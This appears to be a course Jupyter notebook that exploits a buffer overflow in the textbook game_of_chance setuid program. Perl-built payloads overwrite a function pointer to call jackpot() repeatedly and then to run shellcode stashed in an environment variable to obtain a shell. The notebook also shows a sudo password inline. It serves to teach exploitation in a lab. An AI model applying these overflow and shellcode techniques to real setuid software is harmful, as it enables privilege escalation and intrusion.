# Overflowing Function Pointers
- recall function pointers are pointers that store addresses of functions/code
    - see CFundamentals Notebooks for a review
- function pointers can be overwritten using overflow techniques to point to different code/function

## game of chance
- hacking book provides game_of_chance.c program
- program uses a function pointer to remember the last game played
- the pointer is stored in the **user** structure
- player is declared as an uninitialized global variable
    - meaning the memory is allocated in the **bss** segment
    
- copy, examine, compile and run game_of_change.c program

## Note: user is password for current user running notebook with sudo priviledge

In [7]:
! cp ./boosrc/compile.sh .
! cp ./booksrc/game_of_chance.c .
! cp ./booksrc/hacking.h . # hacking.h is untility header file

cp: cannot stat './boosrc/compile.sh': No such file or directory


In [8]:
! cat game_of_chance.c

#include <stdio.h>
#include <string.h>
#include <fcntl.h>
#include <sys/stat.h>
#include <time.h>
#include <stdlib.h>
#include "hacking.h"

#define DATAFILE "/var/chance.data" // File to store user data

// Custom user struct to store information about users
struct user {
   int uid;
   int credits;
   int highscore;
   char name[100];
   int (*current_game) ();
};

// function prototypes
int get_player_data();
void register_new_player();
void update_player_data();
void show_highscore();
void jackpot();
void input_name();
void print_cards(char *, char *, int);
int take_wager(int, int);
void play_the_game();
int pick_a_number();
int dealer_no_match();
int find_the_ace();
void fatal(char *);

// Global variables
struct user player;      // Player struct

int main() {
   int choice, last_game;

   srand(time(0)); // Seed the randomizer with the current time.
   
   if(get_player_data() == -1) // Try to read player data from file.
      register_new_player();    // If there is no data, reg

In [9]:
! echo kali | sudo -S ./compile.sh game_of_chance.c game_of_chance

[sudo] password for kali: game_of_chance.c: In function ‘get_player_data’:
game_of_chance.c:97:10: warning: implicit declaration of function ‘getuid’ [-Wimplicit-function-declaration]
   97 |    uid = getuid();
      |          ^~~~~~
game_of_chance.c:102:17: warning: implicit declaration of function ‘read’; did you mean ‘fread’? [-Wimplicit-function-declaration]
  102 |    read_bytes = read(fd, &entry, sizeof(struct user)); // Read the first chunk.
      |                 ^~~~
      |                 fread
game_of_chance.c:106:4: warning: implicit declaration of function ‘close’; did you mean ‘pclose’? [-Wimplicit-function-declaration]
  106 |    close(fd); // close the file
      |    ^~~~~
      |    pclose
game_of_chance.c: In function ‘register_new_player’:
game_of_chance.c:129:4: warning: implicit declaration of function ‘write’; did you mean ‘fwrite’? [-Wimplicit-function-declaration]
  129 |    write(fd, &player, sizeof(struct user));
      |    ^~~~~
      |    fwrite


In [10]:
# program uses /var/chance.data to store player's information
# let's take a look into it
! echo kali | sudo -S cat /var/chance.data

[sudo] password for kali: �  Z   d   Ram Basnet                                                                                              

In [11]:
# if file exists, delete it to start fresh
! echo kali | sudo -S rm /var/chance.data

[sudo] password for kali: 

In [12]:
! echo kali | sudo -S cat /var/chance.data

[sudo] password for kali: cat: /var/chance.data: No such file or directory


In [13]:
! ls -l ./game_of_chance

-rwxr-xr-x 1 root root 30764 Aug 22 21:49 ./game_of_chance


In [14]:
# make sure game of chance is owned by root
! echo kali | sudo -S chown root:root game_of_chance

[sudo] password for kali: 

In [15]:
# the program can write to /var/ folder if it's a setuid program
! echo kali | sudo -S chmod +s ./game_of_chance

[sudo] password for kali: 

In [16]:
! ls -l ./game_of_chance

-rwsr-sr-x 1 root root 30764 Aug 22 21:49 ./game_of_chance


### play the interactive game
- game_of_chance is an interactive program that doesn't work with Jupyter Notebook as of Aug. 20 2020
- Use Terminal to play the program; follow the menu provided by the program to play the game
- use CTRL-Z to temporarily suspend the current process

## Detect flaw in the game
- do code review to find global **user** object and input_name()
- note **user** struct has declared name buffer of 100 bytes
- input_name() function reads and stores into name field one character at a time until '\n'
- there's nothing to limit it to the length of the destination buffer!
- so, the game has buffer overrun/overflow vulnerability!


## Exploit the overflow flaw
- explore the memory addresses of **name** and **current_game** using peda/gdb
- use gdb to debug the live process
- find the process id of game_of_chance program that's running
```
$ ps aux | grep game_of_chance
$ sudo gdb -q --pid=process id of game_of_chance --symbols=exe with symbols
$ x/x &player.name
$ x/x &player.current_game
$ p/u (address of player.current_game) - (address of player.name)
```
- notice, **name[100]** is at a lower address
- **(\*current_game)()** is at a higher address find the exact size that would overlfow the 
- the offset should be 100
- create a string with 100As + BBBB
- detach the process from gdb and change the name with menu option 5 pasting the following buffer
- Enter 1 to play the game and the buffer should overwrite the [DEBUG] current_game pointer with 0x42424242

In [14]:
# change the name to the following string
! perl -e 'print "A"x100 . "B"x4 . "\n"'

AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABBBB


### Find useful functions/code in the program
- **nm** command lists symbols in object files with corresponding addresses
    - can be used to find addresses of various functions in a program
- jackpot() is intruiging!

In [17]:
! nm game_of_chance
# lists the symbols and corresponding 
# addresses in memory in alphabetical order

0804e05c B __bss_start
         U close@@GLIBC_2.0
0804e060 b completed.7013
0804e054 D __data_start
0804e054 W data_start
08049ee2 T dealer_no_match
080491b0 t deregister_tm_clones
08049190 T _dl_relocate_static_pie
08049230 t __do_global_dtors_aux
0804df10 d __do_global_dtors_aux_fini_array_entry
0804e058 D __dso_handle
08049308 T dump
0804df14 d _DYNAMIC
080492c5 T ec_malloc
0804e05c D _edata
0804e0f4 B _end
         U exit@@GLIBC_2.0
08049262 T fatal
0804a0df T find_the_ace
0804a518 T _fini
0804b000 R _fp_hw
08049260 t frame_dummy
0804df0c d __frame_dummy_init_array_entry
0804bf3c r __FRAME_END__
08049682 T get_player_data
         U getuid@@GLIBC_2.0
0804e000 d _GLOBAL_OFFSET_TABLE_
         w __gmon_start__
0804bb3c r __GNU_EH_FRAME_HDR
08049000 T _init
0804df10 d __init_array_end
0804df0c d __init_array_start
08049abd T input_name
0804b004 R _IO_stdin_used
         U __isoc99_scanf@@GLIBC_2.7
08049a6c T jackpot
0804a510 T __libc_csu_fini
0804a4b0 T __libc_csu_init
         U __l

### scripting the interactive user input
- instead of typing options and commands interactively, they can be scripted and piped into the program
- program can then parse and use the input as if someone is interactively typing it from the std input stream
- make sure the game has been played atleast once by the current user
    - the following script needs to start with full name otherwise!

In [19]:
# plagy game #1, Enter 10 as guessed #, n to paly again; 
# Enter 7 to quit
! perl -e 'print "1\n10\nn\n7\n"' | ./game_of_chance

-=[ Game of Chance Menu ]=-
1 - Play the Pick a Number game
2 - Play the No Match Dealer game
3 - Play the Find the Ace game
4 - View current high score
5 - Change your user name
6 - Reset your account at 100 credits
7 - Quit
[Name: Ram Basnet]
[You have 90 credits] ->  
[DEBUG] current_game pointer @ 0x08049d97

####### Pick a Number ######
This game costs 10 credits to play. Simply pick a number
between 1 and 20, and if you pick the winning number, you
will win the jackpot of 100 credits!

10 credits have been deducted from your account.
Pick a number between 1 and 20: The winning number is 6
Sorry, you didn't win.

You now have 80 credits
Would you like to play again? (y/n)  -=[ Game of Chance Menu ]=-
1 - Play the Pick a Number game
2 - Play the No Match Dealer game
3 - Play the Find the Ace game
4 - View current high score
5 - Change your user name
6 - Reset your account at 100 credits
7 - Quit
[Name: Ram Basnet]
[You have 80 credits] ->  
Thanks for playing! Bye.


In [20]:
# let's replace the current_game with out own data (BBBB)
! perl -e 'print "1\n10\nn\n5\n" . "A"x100 . "BBBB\n" . "1\nn\n7\n"' | ./game_of_chance

-=[ Game of Chance Menu ]=-
1 - Play the Pick a Number game
2 - Play the No Match Dealer game
3 - Play the Find the Ace game
4 - View current high score
5 - Change your user name
6 - Reset your account at 100 credits
7 - Quit
[Name: Ram Basnet]
[You have 80 credits] ->  
[DEBUG] current_game pointer @ 0x08049d97

####### Pick a Number ######
This game costs 10 credits to play. Simply pick a number
between 1 and 20, and if you pick the winning number, you
will win the jackpot of 100 credits!

10 credits have been deducted from your account.
Pick a number between 1 and 20: The winning number is 9
Sorry, you didn't win.

You now have 70 credits
Would you like to play again? (y/n)  -=[ Game of Chance Menu ]=-
1 - Play the Pick a Number game
2 - Play the No Match Dealer game
3 - Play the Find the Ace game
4 - View current high score
5 - Change your user name
6 - Reset your account at 100 credits
7 - Quit
[Name: Ram Basnet]
[You have 70 credits] ->  
Change user name
Enter your new name: You

In [18]:
# note the jackpot()'s address
! nm game_of_chance | grep jackpot

08049a6c T jackpot


In [21]:
# let's create a string mimicking game play with jackpot address!
! perl -e 'print "1\n19\nn\n5\n" . "A"x100 . "\x6c\x9a\x04\x08\n" . "1\nn\n7\n"'
# the following is the sequnce of user input to play the game

1
19
n
5
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAl�
1
n
7


In [22]:
# now let's hit the Jackpot!
! perl -e 'print "1\n19\nn\n5\n" . "A"x100 . "\x6c\x9a\x04\x08\n" . "1\nn\n7\n"' | ./game_of_chance

-=[ Game of Chance Menu ]=-
1 - Play the Pick a Number game
2 - Play the No Match Dealer game
3 - Play the Find the Ace game
4 - View current high score
5 - Change your user name
6 - Reset your account at 100 credits
7 - Quit
[Name: Ram Basnet]
[You have 70 credits] ->  
[DEBUG] current_game pointer @ 0x08049d97

####### Pick a Number ######
This game costs 10 credits to play. Simply pick a number
between 1 and 20, and if you pick the winning number, you
will win the jackpot of 100 credits!

10 credits have been deducted from your account.
Pick a number between 1 and 20: The winning number is 1
Sorry, you didn't win.

You now have 60 credits
Would you like to play again? (y/n)  -=[ Game of Chance Menu ]=-
1 - Play the Pick a Number game
2 - Play the No Match Dealer game
3 - Play the Find the Ace game
4 - View current high score
5 - Change your user name
6 - Reset your account at 100 credits
7 - Quit
[Name: Ram Basnet]
[You have 60 credits] ->  
Change user name
Enter your new name: You

In [23]:
# let's hit the Jackpot 10 times in a row!
# and change to your actual name
! perl -e 'print "1\n19\nn\n5\n" . "A"x100 . "\x6c\x9a\x04\x08\n" . "1\n" . "y\n"x10 . "n\n5\nRam Basnet\n7\n"' | ./game_of_chance

-=[ Game of Chance Menu ]=-
1 - Play the Pick a Number game
2 - Play the No Match Dealer game
3 - Play the Find the Ace game
4 - View current high score
5 - Change your user name
6 - Reset your account at 100 credits
7 - Quit
[Name: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA]
[You have 160 credits] ->  
[DEBUG] current_game pointer @ 0x08049d97

####### Pick a Number ######
This game costs 10 credits to play. Simply pick a number
between 1 and 20, and if you pick the winning number, you
will win the jackpot of 100 credits!

10 credits have been deducted from your account.
Pick a number between 1 and 20: The winning number is 10
Sorry, you didn't win.

You now have 150 credits
Would you like to play again? (y/n)  -=[ Game of Chance Menu ]=-
1 - Play the Pick a Number game
2 - Play the No Match Dealer game
3 - Play the Find the Ace game
4 - View current high score
5 - Change your user name
6 - Reset your account at 100 credits
7 -

## Exploiting with shellcode
- as the program is setuid; it "should" give you a root shell if you can manage to smuggle and execute your shellcode!

## Stashing shellcode in environment variable
- one easy way to exploit is by stashing shellcode as an environment variable
- once the shellcode is exported, you can use getenvaddr program provided by booksrc
- use the address relative to the game_of_chance program to execute the stashed shellcode
- run all or some of the following commands in Terminal

In [24]:
! cp ./booksrc/shellcodex86linuxexec .
! cp ./booksrc/getenvaddr.c .

In [31]:
! cat getenvaddr.c

#include <stdio.h>
#include <stdlib.h>
#include <string.h>

int main(int argc, char *argv[]) {
	char *ptr;

	if(argc < 3) {
		printf("Usage: %s <environment variable> <target program name>\n", argv[0]);
		exit(0);
	}
	ptr = getenv(argv[1]); /* get env var location */
	ptr += (strlen(argv[0]) - strlen(argv[2]))*2; /* adjust for program name */
	printf("%s will be at %p\n", argv[1], ptr);
}


In [30]:
! ./compile.sh getenvaddr.c getenvaddr

#### run the following commands in terminal
export SHELLCODE=$(cat shellcodex86linuxexec)

./getenvaddr SHELLCODE ./game_of_chance

In [28]:
# copy the address of SHELLCODE at the location of current_game after Ax100
! perl -e 'print "1\n18\nn\n5\n" . "A"x100 . "\x8f\xc7\xff\xff\n" . "1\n"' > exploit_game_of_chance

In [29]:
! cat exploit_game_of_chance

1
18
n
5
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA����
1


#### finally, exploit the program
- run this in terminal

``` 
$ cat game_of_chance_exploit - | ./game_of_chance
```
- NOTICE: the hyphen after the exploit
- tells the cat program to send standard input after the exploit buffer, returning control of the input
- eventhough the shell doesn't display its prompt, it is still accessible
    - intersestingly, it doesn't escalate privilege

### Exploiting with shellcode stored in user name
- left as an exercise

## Exercise
- smuggle the shellcode into the name field, find it's address and exploit the program.